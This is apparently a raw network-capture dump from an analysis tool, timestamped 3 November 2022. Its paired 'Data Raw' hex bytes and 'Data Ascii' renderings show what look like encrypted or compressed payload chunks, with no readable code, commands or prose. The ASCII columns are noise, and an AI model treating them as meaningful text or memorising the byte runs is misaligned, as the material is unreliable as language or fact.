                                                                        2022-11-03 06:22:07 UTC129INData Raw: d5 0d 95 e8 91 20 c4 8d b2 bf 89 58 44 01 17 9c f1 cc 42 a3 7d 74 99 b1 c2 94 0c 1b 9b ba 5a eb df ad c7 09 0b cb 83 61 48 35 7f 46 cf 15 e9 55 90 67 e9 38 2e 06 14 ad 9a 5d b2 5e be 1e 83 0c 09 fa 82 0f 89 47 b9 f5 d5 fd d4 a2 f7 e2 a7 58 4b 9a 53 7f f4 86 8d 12 a3 b7 3d e2 c1 d1 7d a6 22 f1 49 d3 c6 d9 e2 31 9a 9b e3 7c 64 66 21 e0 3e fa 20 e3 dd 34 93 b4 40 92 45 0b 41 e3 ba 2b 50 ee 90 b8 b7 58 eb 00 2b c2 3f cd 22 ba 7e e4 6f a4 c3 29 b9 fc de 6c 0f 1e 26 9a ae 1d 7c 1f 62 75 86 62 8e ef c2 fe 2d 30 c6 a9 b6 7e 7a 72 29 95 99 a6 05 c9 73 85 42 b9 54 56 07 9a 71 96 8c 9d 71 7e 0c c1 c9 c1 da 86 ac 28 e9 bb da 06 fb 5b 2f eb 94 2a 5e fd e9 d1 4f 4d ca 1b a5 05 3b b8 b2 e3 cc 70 4f c8 3b 86 9d d6 ee 48 9a 3a 84 52 c4 f3 cd 91 32 d7 5d 84 23 ab ac 46 95
                                                                        Data Ascii: XDB}tZaH5FUg8.]^GXKS=}"I1|df!> 4@EA+PX+?"~o)l&|bub-0~zr)sBTVqq~([/*^OM;pO;H:R2]#F
                                                                        2022-11-03 06:22:07 UTC131INData Raw: 9d 15 1a 44 28 18 06 54 44 4e 9a 8e cb 77 fc 91 cf 83 e4 31 88 b3 aa 29 1a 7a 8a ab 8d e5 08 ef cf 54 0f fd b9 ab 8a da f3 a8 2b a5 5f 62 ac 88 5f ad f8 70 92 42 6c c2 77 79 8d 0c 6d 65 3a aa 0e 54 4f 73 90 42 bd 02 2c 69 7d 78 ec 76 9b d4 f1 0f 72 51 a5 bb a9 85 55 4a 11 a1 e8 1a b4 e2 5c c0 84 74 45 6a a7 e4 b6 44 9d 74 94 31 ab 98 46 82 5f 6f 69 ce 94 90 81 bd f8 9f 59 cb 38 ff 85 b8 9e 3a 1a 51 2f 55 1d 9b 6e 2b 73 2c 8d 82 39 62 b0 40 43 c2 33 ca 1b e8 93 81 74 9d 30 3b 3a 1c 80 67 76 67 82 6d e6 86 3b 6f 88 c0 9f 7e 23 3e 5e 83 39 09 6d 97 17 47 0c 70 2f 23 73 0b 3f 92 3a 25 68 e3 0b d1 d3 c5 c7 5f 77 ab 0b b2 97 7d 38 f1 b3 4d a1 5c a1 7a 0f 74 f9 8c 7a 1f 41 d7 c2 63 14 c5 38 53 02 6b d3 c0 bc ac 28 2d f2 3a 56 41 2c c8 fe a9 1e 2b 37 c9 3a 47 ef
                                                                        Data Ascii: D(TDNw1)zT+_b_pBlwyme:TOsB,i}xvrQUJ\tEjDt1F_oiY8:Q/Un+s,9b@C3t0;:gvgm;o~#>^9mGp/#s?:%h_w}8M\ztzAc8Sk(-:VA,+7:G
                                                                        2022-11-03 06:22:07 UTC132INData Raw: b1 25 49 84 c3 a2 ce 46 38 b1 ab 1f 98 bd 85 cc 17 1d a7 4b 84 9b 47 c5 38 11 69 61 9c 8a 81 01 12 4b 7e 73 b3 83 57 09 11 d5 65 ad 27 84 cb 29 e6 f5 6d b0 0f 60 43 c9 03 a8 93 8c 02 53 e2 88 7b 33 98 39 eb d4 c2 3c e9 25 19 6a c5 79 de 54 97 98 39 8e 1f 58 c9 39 d1 7d 67 0c ba 4f d3 f1 f9 85 ad 59 56 d9 a5 86 c2 fe ce 67 d4 c9 6e 99 ec 64 8a 03 a0 de 00 24 dd e7 d4 24 0c 5c a3 80 97 7c 18 52 10 f7 08 f1 08 d6 bc 5f 67 28 1d 84 ab a7 93 72 f2 68 e3 3a 8f 24 6d 91 c9 02 49 03 e8 32 34 5f c8 2d c3 1c ce 40 de a7 4a ae 18 47 a7 77 dd 11 90 a3 51 06 10 d5 97 bb 1b f9 b1 45 9f f0 8f a9 3c 9d 2b 3c 65 0b c8 fe f8 60 e6 59 23 03 3c 4b 43 31 93 b1 74 4a 9a 7e 14 5b cc 55 e0 db 94 71 df 23 84 db 9a df 1f 76 c4 32 bc c7 9d 62 b8 6d 57 d1 8f f6 48 91 cc 94 58 8a ee
                                                                        Data Ascii: %IF8KG8iaK~sWe')m`CS{39<%jyT9X9}gOYVgnd$$\|R_g(rh:$mI24_-@JGwQE<+<e`Y#<KC1tJ~[Uq#v2bmWHX
                                                                        2022-11-03 06:22:07 UTC133INData Raw: 87 bb bd 37 17 1b 19 43 8e d8 6e 84 b2 12 50 b7 0d 2d 2a 4a 29 8b 82 b0 83 58 ca bf 40 69 d6 99 63 72 6d 26 df dd e7 a0 24 78 25 b7 7e 6c 33 3d 79 dd 16 cd 15 60 00 ef eb 8d 5c e7 28 6c 57 0b 17 9e a8 df 0a 0d 4d 3e af f2 57 7d 36 bf 9d ca a5 94 80 4a 4c 72 2f f1 50 73 7c dc 57 d7 b4 dd f9 a2 e4 bd 83 79 ee 0b 6f 61 63 02 2d 94 7f 5f 23 b4 46 1a 72 39 8c 86 3d b3 8f 10 2e 9a 17 38 4c f4 94 3f d6 70 bb a0 ce 18 30 25 a6 d1 b3 ff 1d 80 bf c1 15 82 06 08 31 3c 33 2c 9f 08 8b 22 68 2e 9f f9 c2 a3 07 67 82 f1 ae db 0c 10 03 23 80 b7 a2 0f 1b 37 b3 cf 0c dd be d3 49 8f 66 ae b4 e9 f0 2e 51 4e 0b a8 ea eb c2 cd a1 95 fe c0 6a d7 b3 51 5a 0b e7 27 e7 00 d3 fe 44 f6 55 98 50 9b ac 69 7b ad 87 42 64 a6 82 84 61 9c 97 16 3b d6 98 da 4b a4 29 f6 09 70 f5 bb c2 64 7f
                                                                        Data Ascii: 7CnP-*J)X@icrm&$x%~l3=y`\(lWM>W}6JLr/Ps|Wyoac-_#Fr9=.8L?p0%1<3,"h.g#7If.QNjQZ'DUPi{Bda;K)pd
                                                                        2022-11-03 06:22:07 UTC134INData Raw: d7 0d a7 db b4 09 57 63 24 8f 28 bd 6d bb 58 b8 e5 83 6f e4 10 f8 1a a1 ae b9 60 51 33 0a 63 69 14 a2 99 39 d2 8e 9f 06 dc 24 a1 04 ce 10 92 7c 86 07 ee 92 45 62 6e bc b9 cc 6c 8e d9 d8 a4 f1 ce bc 29 93 93 28 4c c4 39 54 97 fb b9 bc 19 8e b0 10 6b 35 c5 2b fd eb a9 37 16 1c 3c 72 d4 62 99 fb 84 c3 e7 67 d7 f0 86 db 5f af ce 6e bb f5 c0 ee 4f a6 2e 4b ec 07 a1 88 14 fc 07 36 42 0d 45 ab 89 30 31 19 aa 5c 4a a0 7a dc c8 4c b8 0a 75 fa 85 7a 77 2e cc 65 05 e7 79 84 f2 cb 06 2b dd 53 4d 11 cf c7 c2 64 1a 4c 6e 0a 28 52 6c 29 08 35 14 c2 1b 2f 6b 6f 96 13 49 85 bd 2e 24 e6 c2 45 ab a8 17 60 16 7c cb 9f 4c a7 bf 45 d7 f6 e4 61 fc 4f 0e c7 9d 2d 79 6e c8 66 96 40 a0 fb 59 06 0c 15 52 3a bb e3 e0 33 b1 d4 43 9d f9 91 c6 da 5d 09 7b a4 93 b3 17 3e a5 e7 a5 5c 32
                                                                        Data Ascii: Wc$(mXo`Q3ci9$|Ebnl)(L9Tk5+7<rbg_nO.K6BE01\JzLuzw.ey+SMdLn(Rl)5/koI.$E`|LEaO-ynf@YR:3C]{>\2
                                                                        2022-11-03 06:22:07 UTC136INData Raw: c1 c0 ed 97 a7 8d 67 a3 f0 6b 64 90 29 8e 24 b9 9e e6 62 90 de d9 c4 46 3c 36 99 ae 61 1e 2b f4 21 dc 95 9a 4c f2 bf 4c 95 f2 7d 45 91 dc 60 ad 50 4f f0 a1 7e b3 1f b1 b0 ce a6 42 72 36 48 6c 31 85 c2 de 1d 5e fc 5f aa b1 3a b6 47 0e 76 e2 e2 dd 57 87 c7 c2 a3 a6 ca b8 b4 d9 cb 96 a1 53 d5 b5 61 8a c7 c8 be 11 c8 61 55 b1 2f fe 7b 4e d5 5a 88 a0 75 aa af ca 5c 2d 76 ab a7 de d0 88 c8 a6 5d ce 63 2a 98 cc a2 b1 79 02 5f 29 73 a3 25 fa ae 14 d8 e5 86 ae 0e de bd 99 6e 03 0a 71 ad c5 ef a0 a1 0a 32 77 c0 b7 fe 77 b1 36 be c8 b9 96 c8 68 c2 0c d4 5e 88 76 a7 32 d6 a8 43 9f 57 9f 6e a2 9d 38 82 19 8e fb 66 9f 95 3a 0f c4 0d 3c a8 af 16 2e be cf 57 43 7d fb 25 07 dc 6b 57 9b bb ff bc 81 2f b3 fc 50 16 8d 06 08 12 6e a0 df c0 80 72 d9 ed 0f 66 5e a0 85 5f c6 e2
                                                                        Data Ascii: gkd)$bF<6a+!LL}E`PO~Br6Hl1^_:GvWSaaU/{NZu\-v]c*y_)s%nq2ww6h^v2CWn8f:<.WC}%kW/Pnrf^_
                                                                        2022-11-03 06:22:07 UTC137INData Raw: a4 72 f0 ea 56 44 ff 82 99 61 52 f2 1c b7 b3 b7 d6 60 b0 0c 1e 64 dd 93 14 3f 5e fe 31 0d 17 56 70 a5 c6 a3 6e a3 8a 96 39 8d 60 42 d7 95 db a9 fd 7c b0 6a 78 64 3c 10 3f 29 67 0b 9e fe 59 68 4f d8 89 6d 2e bb ff f6 a4 a4 0b 50 9e 10 49 ce 6a 94 54 46 8b 78 74 7d d2 ed 97 f1 fc cd b0 ee 7c 07 93 5a 70 33 5d f5 a4 33 e8 eb 35 4b 46 aa 08 4e d8 19 35 1a ba 14 7f 27 dd d1 7c db f9 50 6a a6 63 ba 60 38 b2 ed 25 1e ee a4 0d 20 57 f9 84 23 05 82 ad 87 5e c3 b0 b8 1b ed 3c f0 78 45 d8 9a bb 0e cd 03 70 4a c6 f7 d8 98 c2 6f ca e4 b4 9c ef 97 e0 82 c2 1d cd 01 05 62 c7 ec 15 bd 82 76 fc d2 8c 5e 4c 99 c3 16 a6 35 38 79 e1 ac 93 bd 7a 7d b1 52 45 94 5d 8d d0 ef 5f 36 3c 4b 66 38 1d a5 16 91 c3 2c cd 41 ec ee 43 cc 62 01 fd 02 5f be 84 84 05 08 23 18 e2 29 3d 29 6c
                                                                        Data Ascii: rVDaR`d?^1Vpn9`B|jxd<?)gYhOm.PIjTFxt}|Zp3]35KFN5'|Pjc`8% W#^<xEpJobv^L58yz}RE]_6<Kf8,ACb_#)=)l
                                                                        2022-11-03 06:22:07 UTC138INData Raw: b1 7d 31 3b b5 4f db af 49 4a ec 7c 5a 06 6a 0e 86 12 d8 fd eb b8 b5 2f 0f 09 62 f1 35 12 d1 42 87 67 47 7b 8b e0 da e8 9d 13 65 a4 f0 cb ae d5 8c a6 8b ad 5f 9c 0e 3f ba 7f 2a cb 58 ee 4e 80 18 4f 40 65 99 d7 e1 ff 79 06 a9 e4 73 0e 01 fb f1 47 68 ec 51 68 eb d1 6f 94 d1 82 2b 1e 9e 0c 8a 78 d4 0a 79 6a e6 73 c4 d1 11 67 ae 71 b3 1c 4e c6 3b bd a3 e6 c8 30 dd 71 b2 1d 70 1b 28 30 42 34 99 71 84 7d 35 5c d2 b0 f4 9c 78 49 dc 7c 62 1c 23 25 d0 9f 41 a5 71 51 20 72 7e e0 41 e0 8c 36 a1 bd 73 86 ed ab 88 00 93 af 01 3c 15 54 fe d3 0d 88 ed f7 0e 4e e0 e7 0f c8 e9 a5 c0 29 14 9e ed dc 6e b6 37 ad 9f 44 04 ef da 17 87 68 4c a6 fd 8c 4b a3 c1 76 a9 48 ce 8c 5d 9b 07 b2 02 7c f7 de 66 12 22 17 d6 e4 15 5b 1d dd 68 4f 5d 2f 91 26 34 71 92 46 23 2c 9c 3d 5d 22 1a
                                                                        Data Ascii: }1;OIJ|Zj/b5BgG{e_?*XNO@eysGhQho+xyjsgqN;0qp(0B4q}5\xI|b#%AqQ r~A6s<TN)n7DhLKvH]|f"[hO]/&4qF#,=]"
                                                                        2022-11-03 06:22:07 UTC139INData Raw: dd b2 b5 6d 37 19 7b c9 d5 ba 87 a9 1d 8e 0a cd 28 3d d9 28 0f 05 83 22 58 06 53 3c 02 50 b8 c2 bf 95 16 02 9c 01 2e ba 9c d7 b0 b4 b4 12 d5 8c 55 03 c1 79 76 25 71 3f 90 bb b9 2b df f1 a0 fa af 51 85 38 47 e8 d4 88 e7 ab 39 9c be 86 0d c2 71 b1 8b 9a 70 d2 a8 21 b1 57 35 33 87 dc 94 d0 ad 14 68 1e ab 8f 77 76 59 21 8c 1b cb 7d 05 28 d8 d9 55 99 ca 32 a7 9d 14 71 a4 cd 4d 7e 9d 5f 70 4f 9e 35 67 68 62 99 40 73 9e 09 95 09 5f 94 68 16 83 48 f0 fd c4 6a ce 90 fd 53 74 2c c2 8e 85 ed e3 17 fe 25 24 bb 25 1e d3 13 e4 cf 1c 38 b8 a7 aa 50 4f 48 ae 04 ee 27 b4 f0 23 0d d1 d5 95 fa 33 f7 21 39 ef 50 d3 cb f4 72 34 68 8f 3c 95 ed b9 0d 4a 96 6b a0 b5 40 34 af c0 8f 82 17 86 3e 68 ff e2 9b e5 18 dc d8 26 a2 d2 45 24 57 4c 1e b8 1b 88 3b 16 7f cf 67 e8 03 4e 23 0f
                                                                        Data Ascii: m7{(=("XS<P.Uyv%q?+Q8G9qp!W53hwvY!}(U2qM~_pO5ghb@s_hHjSt,%$%8POH'#3!9Pr4h<Jk@4>h&E$WL;gN#
                                                                        2022-11-03 06:22:07 UTC140INData Raw: fb 98 a9 a6 6a a0 a7 47 2f 5f 4a 98 df 76 86 45 d1 e6 bc 2b 32 e1 6b e2 e2 f0 c7 93 d5 10 6e ee af 42 e4 04 3b e2 1b 76 85 87 24 e6 59 e3 f3 aa 9f 6b e2 01 30 6b ac fc 6d d5 be 7d c1 65 24 74 56 cb 57 9f 35 71 21 02 c6 ae 36 9b 7c aa 0a 72 4e c1 db 04 57 c2 4e 14 42 c5 17 dd d9 66 f0 81 0b 02 0b 2f d6 f6 8b df db 97 f6 ee 46 a3 c3 dd 0a d8 80 32 80 c7 11 82 c1 f1 46 16 ee 23 61 4c 61 99 67 9c 73 06 ae 9a 20 f8 90 fe 8d 32 95 70 6d 26 47 0d 56 e2 15 c5 be 13 eb f8 24 2f dd 6f 02 9f bc b0 63 80 7c da f2 63 7f 06 97 e8 3a 1a cb ee 84 35 d6 6b a8 00 af fe 4b 5a e8 c2 3c 73 12 98 ea 24 d1 14 82 b5 f5 7d f1 b3 ee 0d bf 5d 55 97 d2 c2 af b8 f8 15 7d 12 28 41 03 07 9e 81 31 72 20 f4 e0 b8 13 2d 5f 61 8d dd d9 ea 17 de 67 32 60 81 f3 07 55 6a 28 80 6e 87 45 59 a9
                                                                        Data Ascii: jG/_JvE+2knB;v$Yk0km}e$tVW5q!6|rNWNBf/F2F#aLags 2pm&GV$/oc|c:5kKZ<s$}]U}(A1r -_ag2`Uj(nEY
                                                                        2022-11-03 06:22:07 UTC142INData Raw: 6b bb 30 fb 45 db fd a7 11 df 2f 5c 56 80 0f 8b 52 9f df 31 6a 41 45 16 3d 5a 9d 9c 40 e1 a9 fd 59 93 4a e8 a6 8e 66 8d 58 bb f1 57 91 cc f5 9a fe 5f 3f 16 e8 b8 1d 7b 6a db 1f 2a cd c0 96 f6 16 fd cc a0 d4 7c a5 06 ca ec d5 3f 16 32 c5 e5 39 b6 93 87 c0 71 0c a1 6e e9 02 13 9c e6 42 b2 50 15 a9 aa b7 ff ff 4c a2 39 9e 43 ad 98 02 e9 06 ec 01 50 04 05 2b 75 9e 80 7f 5b 1a 3e 6d 66 ee ff 87 96 78 77 f3 cd 36 81 91 89 05 04 a2 ae 3b c5 d6 58 34 25 89 6e 76 9a ee c0 05 b7 04 e6 28 65 81 cd d3 eb ef 3d ad 6f 6e 08 61 f4 b1 4c b9 98 df d4 96 3c 9e 00 62 6c a0 25 df 9c 4e 64 b0 d1 0d 15 2c c1 34 ae 6c 8c 72 1f 0f 32 1d 91 d2 69 09 a9 7e 22 ed 91 69 42 c9 c4 17 7f 66 fb 96 f9 7c 49 57 0e 09 48 91 bd b0 fc f5 81 6c f2 df 1b 47 a7 2a 60 20 e2 a0 c6 23 1b f7 5b af
                                                                        Data Ascii: k0E/\VR1jAE=Z@YJfXW_?{j*|?29qnBPL9CP+u[>mfxw6;X4%nv(e=onaL<bl%Nd,4lr2i~"iBf|IWHlG*` #[
                                                                        2022-11-03 06:22:07 UTC143INData Raw: c0 cf 08 5d 36 9f 9e fb 24 4c 60 d1 b7 c3 da ea 1a af 8f cb a6 80 f0 73 b2 88 8f 9b a0 6d ef fb 73 74 48 e9 a5 e0 a3 12 ad c9 36 f2 63 ee 43 c1 bd 4b 43 11 d6 d2 14 6d 50 77 da ee 1c 84 d0 be c5 8d 96 f8 7a 08 3a 40 7b b4 82 cd d0 e9 db c9 1a ac 7c 54 e6 09 52 ca 07 5d 72 1c 6d c1 1a e2 43 c0 e5 2d fb a9 57 a3 18 b0 5b 93 b2 71 c3 13 5a 4f d4 d9 15 5b 98 a7 a9 10 b7 25 4b 10 84 94 43 bb 86 4f 9d b0 f0 83 cf dc d6 89 ac 59 da 8f 54 9d 8c 49 26 11 9b 88 58 7b f2 ed fc 31 01 1f bf 58 e3 42 f8 32 04 e9 00 7f dc 69 08 c9 6e f0 9b 05 66 1b f0 40 6a 01 4a 3a f6 59 e8 87 10 82 bc 30 65 39 c0 15 c5 6f 99 36 6a 15 9d 72 f1 a0 8e 47 7f 0e 4b 3d 91 e7 b9 75 74 45 c4 17 98 a2 ca 6e 23 b9 91 13 39 1f 16 b4 d4 5b 7f 95 ba 1b eb fa 7d ee 6e c7 e1 26 e7 ac 94 87 38 16 70
                                                                        Data Ascii: ]6$L`smstH6cCKCmPwz:@{|TR]rmC-W[qZO[%KCOYTI&X{1XB2inf@jJ:Y0e9o6jrGK=utEn#9[}n&8p
                                                                        2022-11-03 06:22:07 UTC144INData Raw: 3c 69 d2 23 34 d4 ab f8 64 09 fa 48 50 85 b5 ba df c8 d4 5e a2 42 2e 90 9c b5 e2 30 7c b2 22 13 3c 20 fe 42 0b 09 7c 28 b4 e2 7d 80 b4 6b a6 af 66 33 e0 a4 e8 c5 7d 5b d1 40 2b c2 cd bf 92 ad cb 43 3a 8b 41 1f fa cc 06 29 17 bc 7f 44 49 78 b0 88 a8 52 a7 ce a7 33 0d 25 40 f7 c1 96 3a d8 59 26 d5 b2 74 70 c0 b4 36 8e 5e 07 21 eb f0 07 8e 4a ca c4 fd e8 3d ea 20 3f 8d 7f d2 17 d8 34 54 5a f5 8e 65 ac e9 80 ec a6 ec aa 9d a1 e9 3e a5 22 83 e6 17 d8 cf 57 f2 80 5d 32 70 18 22 44 a7 95 b5 a0 e5 f3 d9 58 e3 89 7d 4e 2f 39 f4 5f a8 fb 3e 2e af 8b f7 e0 4c db 1e 32 44 28 f6 32 03 f1 8b a4 db c6 0f dc bd b0 ef f0 42 d0 78 8c b0 47 cf f7 1e ce 4b 35 f1 62 37 65 39 83 dd 9f 50 2c 82 1b ec b4 b1 76 a1 ee 7a 7f b1 79 5a bc 06 4e 59 5a d5 06 2e 6e 21 26 fa 48 44 22 86
                                                                        Data Ascii: <i#4dHP^B.0|"< B|(}kf3}[@+C:A)DIxR3%@:Y&tp6^!J= ?4TZe>"W]2p"DX}N/9_>.L2D(2BxGK5b7e9P,vzyZNYZ.n!&HD"
                                                                        2022-11-03 06:22:07 UTC145INData Raw: e6 d4 da 35 77 2a cb 36 5e a8 2e 46 5e 96 90 7d 02 0d 7e c7 b4 32 ff 07 73 dd 4d 64 6e f2 e2 e8 0b 3d d9 4c c8 6b 4c 1d ca 1e bd 89 d5 a6 31 b4 c0 a3 8d f2 70 eb 61 24 47 a5 e3 73 79 c8 0f 63 45 0a 1b a3 65 88 74 dc 6a 20 c9 9f 1b 6c 32 d8 cc 2f 27 4b 3c 53 ba bc 8f 3e 10 76 e0 12 55 d7 09 3d 47 0b 5e 3d 3f 54 2f 72 ae 1f
                                                                        Data Ascii: 5w*6^.F^}~2sMdn=LkL1pa$GsycEetj l2/'K<S>vU=G^=?T/r
                                                                        2022-11-03 06:22:07 UTC145INData Raw: 28 01 03 e6 74 70 00 46 f3 45 52 73 cf 73 10 c9 0a 28 f4 e9 15 a9 01 43 56 77 c6 65 9c 6e 21 40 15 ba 0a 1f ca f8 a8 6b ab 5b 25 47 0c 33 e3 81 a0 36 5b 75 fe 51 3e 25 53 46 15 91 cf 4a 89 03 10 95 66 5b bf 0f 22 fa 35 95 7a a7 33 9f fd 9d 42 05 a5 de e6 46 80 db 8a 5f 26 b3 40 16 3e 61 7f 4e 89 8b 4e 05 27 e8 e6 f5 2f 31 3d 82 4b 29 1c 53 40 48 4e 2a 32 06 b7 e0 f9 0d 9b 9f 15 4c 34 90 56 97 70 89 39 e7 04 fd d7 bf 17 9e 82 10 2d ff 14 14 c6 c1 c5 92 67 2c fc 68 76 e2 10 9f a5 11 ab bf 12 d9 b1 a0 26 75 e3 bb 79 8e 3f 0b ba b7 91 4f d1 fc fc 9d 34 26 36 cc c2 a8 02 de 0a 11 41 70 d4 f4 09 bb 3f 6c 87 d1 bb 68 80 01 11 bd c5 5d a8 1f 8d a2 14 9a 49 9e f9 57 39 ad 21 9f 7f 2a 2f a2 3b b2 60 87 64 47 45 62 4c 9f fb c3 4f ec 4c ca 3e 39 ce 03 c8 da 1e 11 9d
                                                                        Data Ascii: (tpFERss(CVwen!@k[%G36[uQ>%SFJf["5z3BF_&@>aNN'/1=K)S@HN*2L4Vp9-g,hv&uy?O4&6Ap?lh]IW9!*/;`dGEbLOL>9
                                                                        2022-11-03 06:22:07 UTC147INData Raw: e8 33 81 eb e7 c9 91 1f 2c d8 27 88 2c dc 3e 3b f1 f7 45 df 6f 1a ab 27 96 7d d1 f2 e3 d4 27 54 44 92 1f c3 f9 5f a4 0e d2 42 c1 f0 78 17 10 3f c9 6e a3 ca 25 c6 1d 22 ad 3a 00 05 c6 e4 41 d1 33 88 41 50 0a 3e f9 d9 c8 b9 4f c3 2e c9 a2 b5 35 ca 14 13 f4 ee 55 f2 fa 58 83 33 ea 42 41 c1 32 cf 15 b6 b5 af f3 8b dd 0d 16 11 99 5f df 21 b5 58 81 ad 75 4b b0 63 2e 47 ba ab a8 9c fd f2 fb f8 6c 64 74 b3 eb 58 31 71 35 58 d2 c8 49 51 d3 0f 31 cf b5 48 a2 9f 0f 15 63 c0 1d 04 8b d2 ed 4c eb ca 45 d2 9a e7 5c 8d 35 f1 40 ea 83 88 5e e7 98 10 17 c4 df b1 d9 d2 51 4e 0d 36 f2 19 8f e3 56 6e e4 3c de 2e e2 ed 66 d4 ef b7 e5 49 74 b7 d3 50 77 4e 22 f2 e4 15 62 78 6d 5e b7 00 cf 8f 91 3b aa e5 25 39 06 a5 79 4e 91 ad f0 90 a3 e5 a3 02 ce 9b db b6 66 94 1c cb 6b 95 23
                                                                        Data Ascii: 3,',>;Eo'}'TD_Bx?n%":A3AP>O.5UX3BA2_!XuKc.GldtX1q5XIQ1HcLE\5@^QN6Vn<.fItPwN"bxm^;%9yNfk#
                                                                        2022-11-03 06:22:07 UTC148INData Raw: 23 8f db 51 c6 5a 2c 5e 99 4a 33 cd 77 da 2f d3 f3 05 ec 1f 90 09 19 2a 8b fd 16 d3 99 13 8c 77 0e 08 a3 13 a9 87 b0 05 4f 3f c7 23 8f 0d aa 04 4f 7b a1 f0 9a d6 82 d5 a5 be 94 7b 02 fd 40 91 f5 8d cc 7a 68 ba 52 1e 3b 36 a4 ee bd a5 06 f5 b8 cc fc dc b3 a1 b2 8a a3 9b c3 40 12 d0 8a 49 f1 b3 1c a3 c4 a5 1c 15 34 63 b8 c4 ac 4b 1b c0 bb 58 08 c6 a4 5a fd 0f 08 c4 21 d3 8a 3a f4 6f ea 5b f5 69 71 e5 27 46 1e a6 a3 69 0a e4 45 44 60 b3 75 a9 4d a9 70 cb 57 f6 70 bd ea aa 3c 93 44 76 33 b7 d4 e7 e1 51 d5 15 13 74 c1 b8 f6 cd 05 c1 12 06 76 b5 bb ea 15 b2 a1 b0 c9 07 c8 05 e6 20 97 cb ce 0d 5f 3f d1 ae 26 6d 6f 10 31 4b 84 11 7d b2 37 a0 33 9e 14 61 99 2d 76 b2 ad a6 8c 2b 46 7b be f9 b0 98 48 bc cf e7 a5 99 34 f2 69 a9 a5 4b 80 1f 3f 7c db d5 67 0e 4b 7a ba
                                                                        Data Ascii: #QZ,^J3w/*wO?#O{{@zhR;6@I4cKXZ!:o[iq'FiED`uMpWp<Dv3Qtv _?&mo1K}73a-v+F{H4iK?|gKz
                                                                        2022-11-03 06:22:07 UTC149INData Raw: a0 66 60 5f f6 3a 48 8e c0 3a 97 5c 30 b3 53 9a 97 08 9b 53 16 82 62 8a 46 0d bc 0f b8 99 db 31 b2 31 d7 f6 7a f4 8d 75 af 69 72 56 c0 d3 cc 05 b7 d9 a7 ff 38 45 31 0e fd 66 31 5c db 67 f9 42 44 c3 42 84 21 df 6f 41 a4 61 67 bf f0 1a 46 93 3c 2c c5 30 d8 d8 be be e3 30 49 90 55 e7 c1 82 c5 57 5a 2d e1 63 a1 8f 89 6b da 1c 8d fb 38 9a 16 d4 53 b6 36 1a 1a c0 bd 46 b0 00 d7 77 c7 fc f1 0d 60 a5 c4 94 32 43 92 f1 34 02 51 fb 90 bf 63 69 d3 fa c8 30 22 52 0f cc c3 41 27 a2 c9 09 88 a1 63 20 2e 09 d3 d1 d4 c0 ec 29 95 a2 c9 fe 72 41 1e 72 5c 81 07 32 20 78 35 5b 77 32 f3 99 c0 1c 50 32 bb 9b 11 09 2b d6 8e 28 07 8e 58 b9 95 06 f3 ac 14 ed 91 d3 8a 20 28 ce 3d b5 d9 54 0a 32 2c cf 97 cf d8 ad 17 42 24 4b 4b d6 c3 7c fe 24 df fd 67 ab 68 52 43 da 95 f5 0d 3e 15
                                                                        Data Ascii: f`_:H:\0SSbF11zuirV8E1f1\gBDB!oAagF<,00IUWZ-ck8S6Fw`2C4Qci0"RA'c .)rAr\2 x5[w2P2+(X (=T2,B$KK|$ghRC>
                                                                        2022-11-03 06:22:07 UTC150INData Raw: 66 4c d6 bd dc 0d f9 61 00 27 30 d4 8f 67 df 11 4e ca e8 5b 57 86 0e 26 ec e2 d7 91 3e d6 d5 46 ec f4 c8 63 8a 42 b1 70 8b a5 47 7f 47 f5 17 af 8a 2c dd 37 6b 74 cb 0f 43 9d 2d 8e 05 4e a2 fd 87 29 27 66 1b 62 f6 83 b5 18 25 de ad 23 e8 a9 3b de 86 ad 7e c1 d0 c0 72 12 e4 bc bf bc d4 d7 1b e3 89 ee b7 4f 89 b3 89 a5 c3 c2 b6 45 9f 0f 3e e4 5a e7 d0 e2 2c 7d ee 24 2b 13 62 6b 02 5a a6 a6 1d 6b fe 1a af ad 16 7c f0 ce 76 b0 fc 42 61 54 2e 90 34 b9 2e 0f 74 91 30 7a 44 f7 fa d7 11 04 8c c7 a3 b9 f6 a0 9d ad 77 07 ff 9c 72 29 cd 90 e0 03 59 b5 5a b2 80 03 45 57 15 f8 b2 95 a4 84 6f e7 6a 41 27 90 88 44 85 05 02 c0 f9 43 a0 27 c1 2d 93 80 80 73 9d 7d 80 77 86 2e 44 4a f3 cf ae ca f3 d8 0e 2a b4 d2 4d fd 3d 5c 53 1d 05 b0 0c 7a 4f b6 33 e2 61 1b bb f7 9c 1b 26
                                                                        Data Ascii: fLa'0gN[W&>FcBpGG,7ktC-N)'fb%#;~rOE>Z,}$+bkZk|vBaT.4.t0zDwr)YZEWojA'DC'-s}w.DJ*M=\SzO3a&
                                                                        2022-11-03 06:22:07 UTC152INData Raw: b9 18 e5 59 b0 9f 91 2d 15 9e fa 92 51 5d 3b 29 30 e7 47 cf 46 98 53 c9 d5 20 30 6c 58 e4 bd 3e 66 b4 58 4c e6 0e 8c bc 0c 58 de b2 67 ba 06 c2 ef b2 6f 0f 6a 06 15 05 a8 25 a8 7c 8f d4 60 11 66 b7 dd 24 71 19 8a b1 22 66 41 fe cb b9 ca 73 73 f3 45 4a 67 51 f9 6a 05 f3 52 37 d5 2a 51 20 3a 83 4a 50 78 38 87 37 8a 09 7e ee ce 4b 62 80 1a e7 c3 cb 79 83 b7 cf 3d c4 8d 58 7d 04 08 a3 42 c4 3a e7 b3 97 f6 d5 88 b0 4a 3a db 47 64 42 c0 a6 75 ae f3 d5 da 78 26 0b 1b 90 80 a4 dc f7 61 fb a3 37 fd 31 88 71 68 bb f5 6e 54 bb 7a 50 69 fd df 21 c6 da 84 2f 1f 3b 96 a5 d4 fc a4 75 5b 69 85 24 8f af 63 9e 05 70 44 5d 5f b3 58 3c 9c 0d 73 0c 4f 07 45 ef de 26 90 3e dc 4c 89 c1 3c b5 3e a9 a8 a8 c1 c3 8b ba 1a 43 56 35 42 1c cf ca aa b7 c1 ba b3 5f 48 9d 1c cb fc 96 33
                                                                        Data Ascii: Y-Q];)0GFS 0lX>fXLXgoj%|`f$q"fAssEJgQjR7*Q :JPx87~Kby=X}B:J:GdBux&a71qhnTzPi!/;u[i$cpD]_X<sOE&>L<>CV5B_H3
